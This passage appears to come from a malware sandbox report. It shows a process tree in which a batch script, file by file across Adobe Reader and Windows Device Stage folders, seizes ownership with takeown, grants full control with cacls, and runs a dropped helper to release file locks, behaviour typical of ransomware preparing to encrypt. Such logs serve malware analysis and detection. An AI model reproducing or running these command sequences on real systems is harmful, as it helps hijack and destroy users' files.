  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:708
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1916
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    - Modifies file permissions
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:1348
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    - Modifies file permissions
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:1708
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:280
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    - Modifies file permissions
    PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    - Modifies file permissions
    PID:1376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:920
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:1348
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:280
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    - Modifies file permissions
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:920
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    PID:976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:1348
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
